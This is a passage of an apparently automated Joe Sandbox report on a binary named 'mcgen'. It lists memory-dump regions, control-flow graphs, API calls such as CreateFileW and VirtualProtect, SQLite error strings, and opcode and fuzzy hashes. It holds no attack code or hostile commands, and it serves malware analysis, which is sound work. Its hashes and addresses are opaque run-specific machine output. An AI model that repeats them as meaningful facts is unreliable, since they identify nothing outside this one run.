                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-4201244970
                                                                                                                                                                                                                                                                    • Opcode ID: fc4aa575c3cfefd8825882f0133770488bd7e5ee514113ffe19fff9c73ff247a
                                                                                                                                                                                                                                                                    • Instruction ID: a2ed56f4cc1cb4501718129f39d65cd3793d7d1be23224a57ab268a4df490380
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc4aa575c3cfefd8825882f0133770488bd7e5ee514113ffe19fff9c73ff247a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9329122B0978286EB759F6594A037E37A0FF46B94F088235CA5E07796EF3DE465D300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-509082904
                                                                                                                                                                                                                                                                    • Opcode ID: bb2508857dcb7d8c4db46005c6d5cba0b088fe6dfdcbe4bc87886fb66250b61f
                                                                                                                                                                                                                                                                    • Instruction ID: def1fc5f6b9cc57c489c49f2b9477d8f08b7e66a81f0e3f6ecee04afb4e89ce1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb2508857dcb7d8c4db46005c6d5cba0b088fe6dfdcbe4bc87886fb66250b61f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D129922B19B4285EE749FA1A4F037967A1BF86B88F188135DE4E1779ACF3DE445C300

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 448 7ff6b9f369d4-7ff6b9f36a47 call 7ff6b9f36708 451 7ff6b9f36a49-7ff6b9f36a52 call 7ff6b9f24f58 448->451 452 7ff6b9f36a61-7ff6b9f36a6b call 7ff6b9f28590 448->452 457 7ff6b9f36a55-7ff6b9f36a5c call 7ff6b9f24f78 451->457 458 7ff6b9f36a86-7ff6b9f36aef CreateFileW 452->458 459 7ff6b9f36a6d-7ff6b9f36a84 call 7ff6b9f24f58 call 7ff6b9f24f78 452->459 471 7ff6b9f36da2-7ff6b9f36dc2 457->471 462 7ff6b9f36b6c-7ff6b9f36b77 GetFileType 458->462 463 7ff6b9f36af1-7ff6b9f36af7 458->463 459->457 465 7ff6b9f36b79-7ff6b9f36bb4 GetLastError call 7ff6b9f24eec CloseHandle 462->465 466 7ff6b9f36bca-7ff6b9f36bd1 462->466 468 7ff6b9f36b39-7ff6b9f36b67 GetLastError call 7ff6b9f24eec 463->468 469 7ff6b9f36af9-7ff6b9f36afd 463->469 465->457 482 7ff6b9f36bba-7ff6b9f36bc5 call 7ff6b9f24f78 465->482 474 7ff6b9f36bd9-7ff6b9f36bdc 466->474 475 7ff6b9f36bd3-7ff6b9f36bd7 466->475 468->457 469->468 476 7ff6b9f36aff-7ff6b9f36b37 CreateFileW 469->476 480 7ff6b9f36be2-7ff6b9f36c37 call 7ff6b9f284a8 474->480 481 7ff6b9f36bde 474->481 475->480 476->462 476->468 486 7ff6b9f36c39-7ff6b9f36c45 call 7ff6b9f36910 480->486 487 7ff6b9f36c56-7ff6b9f36c87 call 7ff6b9f36488 480->487 481->480 482->457 486->487 493 7ff6b9f36c47 486->493 494 7ff6b9f36c89-7ff6b9f36c8b 487->494 495 7ff6b9f36c8d-7ff6b9f36ccf 487->495 496 7ff6b9f36c49-7ff6b9f36c51 call 7ff6b9f2ab30 493->496 494->496 497 7ff6b9f36cf1-7ff6b9f36cfc 495->497 498 7ff6b9f36cd1-7ff6b9f36cd5 495->498 496->471 501 7ff6b9f36da0 497->501 502 7ff6b9f36d02-7ff6b9f36d06 497->502 498->497 500 7ff6b9f36cd7-7ff6b9f36cec 498->500 500->497 501->471 502->501 503 7ff6b9f36d0c-7ff6b9f36d51 CloseHandle CreateFileW 502->503 505 7ff6b9f36d86-7ff6b9f36d9b 503->505 506 7ff6b9f36d53-7ff6b9f36d81 GetLastError call 7ff6b9f24eec call 7ff6b9f286d0 503->506 505->501 506->505
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                    • Instruction ID: 3a7869cc3003580e969181492753bc0c8568c4aa9f79d8b235a2c8f0c9486d47
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EC1AE36B28A4585EB20DFB9C4912BC3769FB49BA9B115229DB2E9B7D4CF3CD451C300

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1138 7ffd94154cf0-7ffd94154dc1 call 7ffd9420382c 1141 7ffd94154dc3-7ffd94154dd6 1138->1141 1142 7ffd94154dd9-7ffd94154ddd 1138->1142 1141->1142 1143 7ffd94154dfd-7ffd94154e03 1142->1143 1144 7ffd94154ddf-7ffd94154df8 call 7ffd940da510 1142->1144 1146 7ffd94154e05-7ffd94154e0f 1143->1146 1147 7ffd94154e16-7ffd94154e1e 1143->1147 1151 7ffd9415526c-7ffd9415529a call 7ffd94154a40 call 7ffd94202920 1144->1151 1146->1147 1149 7ffd94154f01-7ffd94154f09 1147->1149 1150 7ffd94154e24-7ffd94154e2a 1147->1150 1152 7ffd94154f13-7ffd94154f16 1149->1152 1153 7ffd94154f0b-7ffd94154f0e call 7ffd9416e6e0 1149->1153 1154 7ffd94154e30-7ffd94154e37 1150->1154 1155 7ffd94154efc 1150->1155 1159 7ffd94154fbb-7ffd94154fc3 call 7ffd9418fcf0 1152->1159 1160 7ffd94154f1c 1152->1160 1153->1152 1156 7ffd94154e40-7ffd94154e4c 1154->1156 1155->1149 1164 7ffd94154ebe-7ffd94154ec9 1156->1164 1165 7ffd94154e4e-7ffd94154e52 1156->1165 1172 7ffd94154fc8-7ffd94154fcb 1159->1172 1162 7ffd94154f1e-7ffd94154f24 1160->1162 1163 7ffd94154f2a-7ffd94154f31 1160->1163 1162->1159 1162->1163 1168 7ffd94154f33-7ffd94154f56 call 7ffd940da380 call 7ffd940d6d20 1163->1168 1169 7ffd94154f5b-7ffd94154f5e 1163->1169 1173 7ffd94154ecb-7ffd94154ecd 1164->1173 1174 7ffd94154ef7 1164->1174 1170 7ffd94154e54-7ffd94154e5b 1165->1170 1171 7ffd94154e67-7ffd94154e6f 1165->1171 1168->1151 1181 7ffd94154fae-7ffd94154fb9 1169->1181 1182 7ffd94154f60-7ffd94154f72 call 7ffd940d6880 1169->1182 1170->1171 1177 7ffd94154e5d-7ffd94154e65 call 7ffd940eff80 1170->1177 1171->1164 1180 7ffd94154e71-7ffd94154e78 1171->1180 1178 7ffd94154fcd-7ffd94154fd4 1172->1178 1179 7ffd94154fd7-7ffd94154fe3 1172->1179 1173->1156 1174->1155 1177->1171 1178->1179 1185 7ffd94154fe5-7ffd94154ff1 1179->1185 1186 7ffd94155048-7ffd9415504c 1179->1186 1187 7ffd94154e7a-7ffd94154e7e 1180->1187 1188 7ffd94154e87-7ffd94154e8e 1180->1188 1181->1172 1182->1181 1206 7ffd94154f74-7ffd94154fac 00007FFDAC063010 call 7ffd9418fcf0 call 7ffd940d6400 1182->1206 1185->1186 1194 7ffd94154ff3-7ffd94154ffd 1185->1194 1190 7ffd94155061-7ffd94155067 1186->1190 1191 7ffd9415504e-7ffd9415505c 1186->1191 1187->1188 1195 7ffd94154e80-7ffd94154e85 1187->1195 1197 7ffd94154e90-7ffd94154e93 1188->1197 1198 7ffd94154eaa 1188->1198 1201 7ffd94155204-7ffd94155222 1190->1201 1202 7ffd9415506d-7ffd94155070 1190->1202 1200 7ffd94155198-7ffd9415519b 1191->1200 1204 7ffd94154fff 1194->1204 1205 7ffd94155009-7ffd9415500f 1194->1205 1199 7ffd94154eac-7ffd94154eb0 1195->1199 1207 7ffd94154ea1-7ffd94154ea8 1197->1207 1208 7ffd94154e95-7ffd94154e99 1197->1208 1198->1199 1209 7ffd94154eb2-7ffd94154eb5 call 7ffd940eff50 1199->1209 1210 7ffd94154eba-7ffd94154ebc 1199->1210 1211 7ffd9415519d-7ffd941551a0 call 7ffd94105a70 1200->1211 1212 7ffd941551a5-7ffd941551b1 1200->1212 1213 7ffd94155224-7ffd9415522d 1201->1213 1214 7ffd9415523f-7ffd94155246 1201->1214 1202->1201 1215 7ffd94155076-7ffd9415507b 1202->1215 1204->1205 1216 7ffd94155011-7ffd94155023 call 7ffd940d6880 1205->1216 1217 7ffd9415503a 1205->1217 1206->1172 1207->1197 1207->1198 1208->1207 1219 7ffd94154e9b-7ffd94154e9f 1208->1219 1209->1210 1210->1164 1221 7ffd94154ed2-7ffd94154ef2 call 7ffd940da380 1210->1221 1211->1212 1226 7ffd941551b3-7ffd941551cc call 7ffd940da380 1212->1226 1227 7ffd941551d8-7ffd941551e1 1212->1227 1223 7ffd9415522f-7ffd94155237 call 7ffd94100690 1213->1223 1224 7ffd94155239 1213->1224 1214->1151 1228 7ffd94155248 1214->1228 1215->1200 1225 7ffd94155081-7ffd94155088 1215->1225 1231 7ffd9415503c-7ffd94155043 1216->1231 1247 7ffd94155025-7ffd94155038 00007FFDAC063010 1216->1247 1217->1231 1219->1195 1219->1207 1221->1151 1223->1214 1224->1214 1225->1200 1233 7ffd9415508e-7ffd9415509a 1225->1233 1226->1214 1252 7ffd941551ce-7ffd941551d6 call 7ffd940d6400 1226->1252 1238 7ffd941551e3-7ffd941551eb 1227->1238 1239 7ffd941551f6-7ffd94155202 call 7ffd940da260 1227->1239 1236 7ffd94155250-7ffd9415526a call 7ffd940d6400 1228->1236 1231->1186 1233->1200 1243 7ffd941550a0-7ffd941550ad 1233->1243 1236->1151 1238->1239 1248 7ffd941551ed-7ffd941551f4 1238->1248 1239->1214 1251 7ffd941550b0-7ffd941550c4 1243->1251 1247->1231 1248->1214 1254 7ffd9415517d-7ffd94155188 1251->1254 1255 7ffd941550ca-7ffd941550ce 1251->1255 1252->1214 1254->1251 1257 7ffd9415518e-7ffd94155193 1254->1257 1258 7ffd941550d0-7ffd941550e2 call 7ffd940f3820 1255->1258 1259 7ffd94155108-7ffd94155110 1255->1259 1257->1200 1272 7ffd941550e4-7ffd941550e9 1258->1272 1273 7ffd941550eb-7ffd941550f3 call 7ffd940d6c40 1258->1273 1261 7ffd94155112-7ffd94155119 1259->1261 1262 7ffd94155123-7ffd94155136 1259->1262 1261->1262 1264 7ffd9415511b-7ffd9415511e call 7ffd940eff80 1261->1264 1265 7ffd94155146-7ffd94155152 1262->1265 1266 7ffd94155138-7ffd9415513c 1262->1266 1264->1262 1270 7ffd94155154-7ffd94155169 call 7ffd94131310 1265->1270 1271 7ffd9415516e-7ffd94155173 1265->1271 1266->1265 1269 7ffd9415513e-7ffd94155141 call 7ffd940eff50 1266->1269 1269->1265 1270->1271 1271->1254 1277 7ffd94155175-7ffd94155178 call 7ffd940f4c10 1271->1277 1272->1273 1276 7ffd941550f7-7ffd941550fa 1272->1276 1273->1276 1276->1257 1281 7ffd94155100 1276->1281 1277->1254 1281->1259
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-1046679716
                                                                                                                                                                                                                                                                    • Opcode ID: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
                                                                                                                                                                                                                                                                    • Instruction ID: 5315c26b716a261e3afa3ba57158ef40f46152ec771cf8ba07c5015e7860bf37
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF16223B0C68186EB359FA594A43FA7BA0FB86B48F198135DA4D1779ADF7CE441C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2536268367.00007FFD948A5000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FFD94250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535216622.00007FFD94250000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD94251000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD94527000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD94536000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD94540000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD94582000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD94651000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD9475D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD94761000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD947A8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD947B0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD947F1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD94825000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD9484F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD94864000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535253168.00007FFD9489E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536310062.00007FFD948A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd94250000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3300690313-0
                                                                                                                                                                                                                                                                    • Opcode ID: 662937bf5eab52d13515c477ba44b596dd64b1bd4478d146c43571e1c103da3e
                                                                                                                                                                                                                                                                    • Instruction ID: e320125ad75069a756ccf5a5ba2958a8cbfc318b3bff68fa64318bed46536124
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 662937bf5eab52d13515c477ba44b596dd64b1bd4478d146c43571e1c103da3e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB6288A272919286E7258F38D49037D7790FB49385F049131EAEED37C9EABCEA45C710
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: :memory:
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-2920599690
                                                                                                                                                                                                                                                                    • Opcode ID: 1f6d5d266e673db7d7665723c418e299b62722c6e59ad763f08cdc77f1bc056a
                                                                                                                                                                                                                                                                    • Instruction ID: 264fda48794dc7e9d1e8cc22cb54d1caee94d031fbbd749d33f5821129e59954
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f6d5d266e673db7d7665723c418e299b62722c6e59ad763f08cdc77f1bc056a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF427F22B0978282EA75DBA594B037927A0FF86F44F548179CE4D07792DF3EE995D300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                                                                                                                    • Opcode ID: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
                                                                                                                                                                                                                                                                    • Instruction ID: 9be823d5a0974f2a561a8aa63bfc2fc61c29cdeae727e8f1de1af2e15de27c8b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15A1E961B0AB4781EF78CBD5A8F427622A0BF46B84F54C535C95D4E7A2EF2DE5A0D300

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 0 7ff6b9f11950-7ff6b9f1198b call 7ff6b9f145b0 3 7ff6b9f11c4e-7ff6b9f11c72 call 7ff6b9f1c5c0 0->3 4 7ff6b9f11991-7ff6b9f119d1 call 7ff6b9f17f80 0->4 9 7ff6b9f119d7-7ff6b9f119e7 call 7ff6b9f20744 4->9 10 7ff6b9f11c3b-7ff6b9f11c3e call 7ff6b9f200bc 4->10 15 7ff6b9f11a08-7ff6b9f11a24 call 7ff6b9f2040c 9->15 16 7ff6b9f119e9-7ff6b9f11a03 call 7ff6b9f24f78 call 7ff6b9f12910 9->16 13 7ff6b9f11c43-7ff6b9f11c4b 10->13 13->3 22 7ff6b9f11a26-7ff6b9f11a40 call 7ff6b9f24f78 call 7ff6b9f12910 15->22 23 7ff6b9f11a45-7ff6b9f11a5a call 7ff6b9f24f98 15->23 16->10 22->10 29 7ff6b9f11a7b-7ff6b9f11afc call 7ff6b9f11c80 * 2 call 7ff6b9f20744 23->29 30 7ff6b9f11a5c-7ff6b9f11a76 call 7ff6b9f24f78 call 7ff6b9f12910 23->30 42 7ff6b9f11b01-7ff6b9f11b14 call 7ff6b9f24fb4 29->42 30->10 45 7ff6b9f11b16-7ff6b9f11b30 call 7ff6b9f24f78 call 7ff6b9f12910 42->45 46 7ff6b9f11b35-7ff6b9f11b4e call 7ff6b9f2040c 42->46 45->10 52 7ff6b9f11b6f-7ff6b9f11b8b call 7ff6b9f20180 46->52 53 7ff6b9f11b50-7ff6b9f11b6a call 7ff6b9f24f78 call 7ff6b9f12910 46->53 60 7ff6b9f11b8d-7ff6b9f11b99 call 7ff6b9f12710 52->60 61 7ff6b9f11b9e-7ff6b9f11bac 52->61 53->10 60->10 61->10 62 7ff6b9f11bb2-7ff6b9f11bb9 61->62 66 7ff6b9f11bc1-7ff6b9f11bc7 62->66 67 7ff6b9f11bc9-7ff6b9f11bd6 66->67 68 7ff6b9f11be0-7ff6b9f11bef 66->68 69 7ff6b9f11bf1-7ff6b9f11bfa 67->69 68->68 68->69 70 7ff6b9f11bfc-7ff6b9f11bff 69->70 71 7ff6b9f11c0f 69->71 70->71 72 7ff6b9f11c01-7ff6b9f11c04 70->72 73 7ff6b9f11c11-7ff6b9f11c24 71->73 72->71 74 7ff6b9f11c06-7ff6b9f11c09 72->74 75 7ff6b9f11c26 73->75 76 7ff6b9f11c2d-7ff6b9f11c39 73->76 74->71 77 7ff6b9f11c0b-7ff6b9f11c0d 74->77 75->76 76->10 76->66 77->73
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F17F80: _fread_nolock.LIBCMT ref: 00007FF6B9F1802A
                                                                                                                                                                                                                                                                    • _fread_nolock.LIBCMT ref: 00007FF6B9F11A1B
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F12910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B9F11B6A), ref: 00007FF6B9F1295E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _fread_nolock$CurrentProcess
